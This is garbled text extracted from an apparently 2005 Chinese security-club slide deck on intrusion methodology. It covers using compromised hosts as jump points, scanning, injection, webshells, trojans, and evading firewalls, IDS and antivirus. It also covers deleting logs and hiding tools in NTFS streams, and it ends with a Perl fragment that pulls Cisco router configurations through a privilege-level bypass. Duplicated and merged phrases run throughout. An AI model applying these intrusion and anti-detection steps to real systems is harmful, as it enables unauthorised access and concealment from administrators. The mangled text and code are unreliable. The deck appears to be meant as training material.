《学习]网络攻防之4-系统与网络攻击基础.ppt》由会员分享,可在线阅读,更多相关《学习]网络攻防之4-系统与网络攻击基础.ppt(23页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。
1、百安网络攻防学习小组系统与网络攻击By:?2005-9-18本资料属于百安信息系统安全俱乐部所有,本资料属于百安信息系统安全俱乐部所有,仅限于个人学习之用,请勿用于其它商业目的仅限于个人学习之用,请勿用于其它商业目的课间目录课间目录黑客简史黑客简史前入侵行为前入侵行为入侵行为入侵行为后入侵行为后入侵行为深入入侵行为深入入侵行为实战演示实战演示入侵行为入侵行为入侵行为的准备跳板(肉鸡)为什么要用肉鸡?隐藏攻击源地址获得更快的网速如何长期控制肉鸡?商业程序控制后门程序控制做成代理服务器或者VPN服务器肉鸡如何使用?攻击跳板深入攻击入侵行为入侵行为前期扫描行为端口SuperScan(165534)弱
2、密码XScan(FTP,Telnet,SMTP,HTTP,POP3,NT)漏洞扫描SSS(WEB漏洞,系统漏洞,网络设备漏洞)NBSI(ASP注射)CASI(PHP注射)入侵行为入侵行为根据漏洞实施攻击远程溢出操作系统(MS04011,MS05039)第三方软件(MSSQL,Serv-U,IMail)注射漏洞ASP+MSSQLPHP+MYSQLJSP+ORACLE权限提升社会工程本地溢出入侵行为入侵行为脚本漏洞DVBBS动网文件上传漏洞BBSXP获得后台权限漏洞Discuz论坛获取密码漏洞针对客户端软件的攻击IESSH ClientMSNQQ办公软件重复?重复?入侵行为入侵行为综合攻击行为动网
3、论坛Serv-UWin2K ServIMailLinux(Unix)弱密码 社会工程学信箱攻击聊天攻击骗取信任,运行木马程序入侵行为入侵行为入侵行为得一些共性基本浏览与扫描基本浏览与扫描webshell侵占服务器侵占服务器cmdshell入侵行为入侵行为需要小心的几类文件EXE(可执行文件)CHM(帮助文件)DOC(Office Word文档)EML(邮件文件)VBS(windows 脚本文件)JSE(windows脚本文件)等文件入侵行为入侵行为入侵行为要避免的几项攻击源的暴露目标防火墙系统(主机型,网关型)目标杀毒软件网络IDS系统(主机型,网关型)目标上各类日志文件改动与服务器重启入侵行
4、为入侵行为初级入侵者经常犯的几个小错误使用目标机器IE下载工具使用“开始”,“运行”来运行CMDIIS日志不删除默认配置的后门明文的脚本后门入侵时使用的工具入侵行为入侵行为高级入侵者的方法使用命令行的wget程序来下载清除历史运行记录,并还原原来的运行记录有选择性的删除IIS日志,并恢复日志文件时间自己编写的木马程序加密的脚本后门入侵工具的隐藏入侵行为入侵行为躲避防火墙利用漏洞切入点寻找可以直接入侵的端口利用WEB服务利用注射攻击利用WEBSHELL提权限利用WEBSHELL控制服务器使用反连攻击方法Trans.exe,fpipe.exe,HTran.exe,反连木马,线程注射,驱动发包入侵行
5、为入侵行为躲避入侵检测系统入侵特征数据的编码Unicode,HTTP,VBS洪水伪装入侵数据大量伪装特征码D.O.S攻击袭击IDS系统Synflood针对入侵检测系统的构建基础Monitor入侵行为入侵行为躲避杀毒软件KILL掉杀毒软件PslistPskill可执行程序压缩Aspack,UPX使用0day的工具自己编写的木马,黑客工具等入侵行为入侵行为百安信息系统安全俱乐部百安信息系统安全俱乐部入侵行为入侵行为百安信息系统安全俱乐部百安信息系统安全俱乐部入侵行为入侵行为躲避管理员常规检查将工具隐藏在深层目录C:winntsystem32MsDtcTrace压缩、加密、改名利用RAR的加密功能N
6、TFS流数据隐藏入侵行为入侵行为百安信息系统安全俱乐部百安信息系统安全俱乐部入侵行为入侵行为网络设备的入侵拒绝服务利用网络协议的漏洞(D.O.S)利用设备系统的漏洞(CISCO)信息泄露CISCO配置信息泄露漏洞(脚本工具)辅助性攻击Sniffer攻击(协议漏洞特殊工具)扩大攻击范围(突破VLAN)入侵行为入侵行为for($level=16;$level=100;$level+)for($level=16;$level$request-uri(uri(http:/$host/level/$level/exec/show/confighttp:/$host/level/$level/exec/s
7、how/config););$response=$agent-$response=$agent-request($requestrequest($request););if($response-if($response-is_successis_success)open(HOSTopen(HOST,$host)|die(Cant open file);,$host)|die(Cant open file);print HOST$response-content;print HOST$response-content;close(HOSTclose(HOST););print exploited.n;print exploited.n;exit;exit;提问?提问?百安信息安全攻防课程结束百安信息安全攻防课程结束再见再见